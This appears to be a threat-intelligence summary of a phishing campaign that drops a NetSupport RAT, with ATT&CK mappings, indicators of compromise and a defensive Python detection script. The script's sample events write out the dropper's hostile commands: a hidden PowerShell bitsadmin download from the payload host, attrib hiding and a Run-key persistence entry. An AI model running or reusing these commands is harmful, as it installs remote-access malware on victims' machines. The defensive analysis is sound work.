A Zalando phishing campaign delivered a JavaScript dropper that downloads a Windows RAT. The dropper uses obfuscation, BitsAdmin/PowerShell-based downloads, hides artifacts, and establishes persistence while contacting a NetSupport Manager RAT C2.
Key points
- A phishing campaign targeted Zalando customers and used an attached archive to deliver malware.
- The archive contains a JavaScript dropper (nine-life1107.js) that is obfuscated and references Windows scripting concepts.
- The dropper uses Windows-based LOLBins (BitsAdmin / PowerShell) to download payloads from remote sites.
MITRE Techniques
- [T1566.001] Phishing: Spearphishing Attachment – The attached archive contains a single JavaScript file. ‘The attached archive contains a single JavaScript file:’
- [T1059.007] JavaScript – The script contains references to “WScript” to call the method “ShellExecute”. ‘The script contains some references to “WScript” to call the method “ShellExecute”… We are facing a script for Windows.’
- [T1059.001] PowerShell – The dropper uses PowerShell to download and execute payloads; ‘This tool can be called directly from Powershell. That’s what the attacker is testing in this case.’
- [T1105] Ingress Tool Transfer – The dropper downloads many files from a website; ‘download many files from a website.’
- [T1564.001] Hide Artifacts – The directory attributes are modified to hide it. ‘and the directory attributes are modified to hide it.’
- [T1547.001] Boot or Logon Autostart Execution: Registry Run Keys – The dropper establishes persistence via a Run registry key. ‘New-ItemProperty -Path ‘HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run’ -Name … -Value …’
Indicators of Compromise
- [File] nine-life1107.js – dropper JavaScript file; nine-life1107.zip contains it
- [File] client32.exe – NetSupport Manager RAT executable
- [File] client32.ini – RAT configuration
- [Hash] 89f0c8f170fe9ea28b1056517160e92e2d7d4e8aa81f4ed696932230413a6ce1
- [Domain] jokosampbulid1[.]com:1412 – C2 server
- [Domain] tukudewe[.]com – payload download host
- [URL] https://tukudewe.com/js/h3b2_jsg/ – payload download path
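The techniques and indicators listed above translate directly into endpoint detection logic. The following is an added example, not code from the ISC diary or this summary: it runs a small set of behavioural rules (script host executing a .js file, BitsAdmin/PowerShell downloads, attrib-based hiding, Run-key writes into user-writable paths) and the page's IoCs over constructed Sysmon-style events. The event dictionaries, their field names (`type`, `image`, `cmdline`, `target`, `details`, `path`, `sha256`, `query`), the directory names and the SID are assumptions made for the example; the page does not say which file the listed SHA-256 belongs to, so it is attached to a placeholder file event.

```python
import re
from dataclasses import dataclass

# Indicators taken from the summary above (defanged domains re-fanged so they match log fields).
IOC_DOMAINS = {"tukudewe.com", "jokosampbulid1.com"}
IOC_FILES = {"nine-life1107.js", "nine-life1107.zip", "client32.exe", "client32.ini"}
IOC_SHA256 = {"89f0c8f170fe9ea28b1056517160e92e2d7d4e8aa81f4ed696932230413a6ce1"}

# Behavioural patterns for the listed ATT&CK techniques (patterns are this example's assumptions).
RUN_KEY_RE = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(\\|$)", re.I)
LOLBIN_DL_RE = re.compile(r"bitsadmin(\.exe)?\s+/transfer|Start-BitsTransfer|Invoke-WebRequest|DownloadFile\(", re.I)
SCRIPT_HOST_RE = re.compile(r"\b[wc]script(\.exe)?\b.*\.js\b", re.I)
HIDE_RE = re.compile(r"\battrib(\.exe)?\b[^&|]*\+h|\.Attributes\s*=.*Hidden", re.I)
USER_WRITABLE_RE = re.compile(r"\\(AppData|Temp|Users\\Public|ProgramData)\\", re.I)


@dataclass(frozen=True)
class Finding:
    technique: str  # ATT&CK id, or "IOC" for a direct indicator match
    reason: str


def _host_hits(text: str) -> set[str]:
    """Return every known C2/download domain that appears in the text."""
    return {d for d in IOC_DOMAINS if d in text.lower()}


def analyze_event(ev: dict) -> list[Finding]:
    """Map one endpoint event (constructed Sysmon-style dict) to the techniques or IoCs it evidences."""
    out: list[Finding] = []
    kind = ev.get("type")
    if kind == "process":
        cmd = ev.get("cmdline", "")
        image = ev.get("image", "").lower()
        if SCRIPT_HOST_RE.search(cmd):
            out.append(Finding("T1059.007", "script host executing a .js file"))
        if LOLBIN_DL_RE.search(cmd):
            out.append(Finding("T1105", "LOLBin download in command line"))
            if image.endswith(("powershell.exe", "pwsh.exe")):
                out.append(Finding("T1059.001", "download issued from PowerShell"))
        if HIDE_RE.search(cmd):
            out.append(Finding("T1564.001", "hidden attribute set via command line"))
        for d in _host_hits(cmd):
            out.append(Finding("IOC", f"known host {d} in command line"))
        for f in IOC_FILES:
            if f in cmd.lower():
                out.append(Finding("IOC", f"known filename {f} in command line"))
    elif kind == "registry":
        if RUN_KEY_RE.search(ev.get("target", "")):
            reason = "Run key written"
            if USER_WRITABLE_RE.search(ev.get("details", "")):
                reason += " pointing into a user-writable directory"
            out.append(Finding("T1547.001", reason))
    elif kind == "file":
        name = ev.get("path", "").rsplit("\\", 1)[-1].lower()
        if name in IOC_FILES:
            out.append(Finding("IOC", f"known filename {name}"))
        if ev.get("sha256", "").lower() in IOC_SHA256:
            out.append(Finding("IOC", "known SHA-256"))
    elif kind == "dns":
        for d in _host_hits(ev.get("query", "")):
            out.append(Finding("IOC", f"DNS query for {d}"))
    return out


def triage(events: list[dict]) -> dict[str, list[str]]:
    """Aggregate findings across all events, keyed by technique id."""
    hits: dict[str, list[str]] = {}
    for ev in events:
        for f in analyze_event(ev):
            hits.setdefault(f.technique, []).append(f.reason)
    return hits


# Constructed sample telemetry modelled on the chain described in the summary (not real log data).
SAMPLE_EVENTS = [
    {"type": "process", "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe "C:\Users\victim\Downloads\nine-life1107.js"'},
    {"type": "process", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell -w hidden -c "bitsadmin /transfer job /download /priority high '
                r'https://tukudewe.com/js/h3b2_jsg/client32.exe C:\Users\victim\AppData\Roaming\nsm\client32.exe"'},
    {"type": "process", "image": r"C:\Windows\System32\attrib.exe",
     "cmdline": r'attrib +h +s "C:\Users\victim\AppData\Roaming\nsm"'},
    {"type": "registry", "target": r"HKU\S-1-5-21-0-0-0-1001\Software\Microsoft\Windows\CurrentVersion\Run\nsm",
     "details": r"C:\Users\victim\AppData\Roaming\nsm\client32.exe"},
    {"type": "file", "path": r"C:\Users\victim\AppData\Roaming\nsm\client32.ini", "sha256": ""},
    {"type": "file", "path": r"C:\Users\victim\Downloads\PLACEHOLDER.bin",  # file name unknown; hash from the page
     "sha256": "89f0c8f170fe9ea28b1056517160e92e2d7d4e8aa81f4ed696932230413a6ce1"},
    {"type": "dns", "query": "jokosampbulid1.com"},
    {"type": "process", "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe notes.txt"},  # benign
]

if __name__ == "__main__":
    for technique, reasons in sorted(triage(SAMPLE_EVENTS).items()):
        print(technique, "->", "; ".join(reasons))
```

The behavioural rules are the durable part: the domains and filenames in the IoC list will rotate between campaigns, but a script host launching a .js from a Downloads folder, a BitsAdmin transfer spawned by PowerShell, and a Run key pointing into AppData keep firing on the next variant of the same dropper.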
Read more: https://isc.sans.edu/diary/From+a+Zalando+Phishing+to+a+RAT/30136/